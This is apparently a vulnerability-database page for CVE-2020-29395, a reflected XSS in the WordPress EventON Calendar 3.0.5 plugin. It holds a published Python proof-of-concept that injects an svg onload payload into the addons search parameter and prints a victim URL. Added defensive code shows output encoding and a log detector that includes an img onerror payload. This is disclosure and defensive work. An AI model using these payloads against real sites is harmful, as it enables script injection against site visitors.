| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2020-29395 | 15 Dec 2020 14:02 | – | circl |
| WordPress plugin cross-site scripting vulnerability | 30 Nov 2020 00:00 | – | cnnvd |
| WordPress EventON Cross-Site Scripting Vulnerability | 1 Dec 2020 00:00 | – | cnvd |
| CVE-2020-29395 | 30 Nov 2020 19:05 | – | cve |
| CVE-2020-29395 | 30 Nov 2020 19:05 | – | cvelist |
| Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting | 6 Jun 2026 03:01 | – | nuclei |
| CVE-2020-29395 | 30 Nov 2020 20:15 | – | nvd |
| CVE-2020-29395 | 30 Nov 2020 20:15 | – | osv |
| WordPress eventON premium plugin <= 3.0.5 - Cross-Site Scripting (XSS) vulnerability | 1 Dec 2020 00:00 | – | patchstack |
| Design/Logic Flaw | 30 Nov 2020 20:15 | – | prion |
```python
# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
# Date: 27.11.2020
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
# Vendor Homepage: https://www.myeventon.com/
# Version: 3.0.5
# Tested on: Ubuntu 18.04
# CVE : 2020-29395
# Description Link: https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
"""
~ VULNERABILITY DETAILS ~
https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
#
WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected
into the search field.
#
The following python code will inject javascript code and print out url that will be sent to victim.
If you use unicode characters for xss, exploit will print page source.
##USAGE##
$ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'
##OUTPUT##
[+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
"""
import requests
import sys
import argparse
from colorama import Fore


def vuln_reflected(url, payload):
    # Request the search page with the payload appended to the ?q= parameter.
    s = requests.Session()
    get_request = s.get(url + payload)
    if get_request.status_code == 500:
        # A 500 is treated as a sign that a WAF or filter rejected the request.
        print(Fore.GREEN + "[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")
    else:
        # The page is considered vulnerable if the payload is reflected verbatim.
        content_result = str(get_request.content)
        search_find = content_result.find(payload)
        if search_find != -1:
            print(Fore.GREEN + "[+] " + str(url) + str(payload))
        else:
            print(content_result)


def main():
    desc = "Wordpress EventON Calendar Plugin XSS"
    parser = argparse.ArgumentParser(description=desc)
    exp_option = parser.add_argument_group('')
    parser.add_argument("--exploit", help="", action='store_true')
    parser.add_argument("--url", help="", type=str, required=False)
    parser.add_argument("--payload", help="", type=str, required=False)
    args = parser.parse_args()
    if args.exploit:
        if args.url:
            if args.payload:
                url = args.url
                payload = args.payload
                vuln_reflected(url, payload)


if __name__ == '__main__':
    main()
```
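The advisory above describes a reflected XSS in the `q` search parameter of `/addons/`: the plugin echoes the search term into the page without encoding it, so the exploit script simply checks whether the raw payload comes back in the response body. The following Python is an added example, not part of the advisory or the plugin's code. It uses a hypothetical `render_search_header` stand-in for the plugin's page (the real PHP template is not on this page) to contrast the unencoded reflection with the output-encoding fix, and it runs a small detector over constructed Apache-style access-log lines to flag search requests carrying tag or event-handler markup. The log lines, IPs and timestamps are constructed; the one payload used is the advisory's own.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The advisory's payload (the only one on the page).
SAMPLE_PAYLOAD = "<svg/onload=alert(/b3kc4t/)>"


def render_search_header(q: str, escape: bool) -> str:
    """Hypothetical stand-in for the plugin's addons search page, which echoes
    the user-supplied ``q`` into HTML. escape=False reproduces the vulnerable
    reflection; escape=True applies the fix (HTML entity encoding on output)."""
    shown = html.escape(q, quote=True) if escape else q
    return f'<h2>Search results for "{shown}"</h2>'


def reflects_unescaped(page: str, q: str) -> bool:
    """Same test the advisory's script applies: is the raw payload in the page?"""
    return page.find(q) != -1


# Constructed access-log lines in Apache/nginx combined format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [30/Nov/2020:19:05:01 +0000] "GET /addons/?q=conference HTTP/1.1" 200 5123
10.0.0.9 - - [30/Nov/2020:19:05:07 +0000] "GET /addons/?q=%3Csvg%2Fonload%3Dalert%28%2Fb3kc4t%2F%29%3E HTTP/1.1" 200 5201
10.0.0.9 - - [30/Nov/2020:19:05:09 +0000] "GET /addons/?q=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E HTTP/1.1" 200 5201
10.0.0.7 - - [30/Nov/2020:19:06:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Markup that has no place in a calendar search term: a tag opener or an on*= handler.
XSS_MARKERS = re.compile(r'<\s*[a-z!/]|\bon[a-z]+\s*=', re.IGNORECASE)


def flag_reflected_xss_attempts(log_text: str) -> list:
    """Return one record per request whose /addons/ ?q= value contains markup.

    parse_qs already percent-decodes once; a second unquote catches values that
    were double-encoded to slip past naive filters."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if not parts.path.startswith("/addons/"):
            continue
        for q in parse_qs(parts.query).get("q", []):
            decoded = unquote(q)
            if XSS_MARKERS.search(decoded):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "q": decoded})
    return hits


if __name__ == "__main__":
    print(render_search_header(SAMPLE_PAYLOAD, escape=False))
    print(render_search_header(SAMPLE_PAYLOAD, escape=True))
    for hit in flag_reflected_xss_attempts(SAMPLE_LOG):
        print(f"[!] {hit['ts']} {hit['ip']} q={hit['q']}")
```

The encoded header is what a patched plugin should emit: the payload survives as text (`&lt;svg/onload=...&gt;`) but no tag is created, so the advisory's "payload present in response" check no longer matches. The detector is intentionally narrow (only the vulnerable endpoint and parameter), which keeps it cheap to run over historical logs when judging whether an unpatched site was probed.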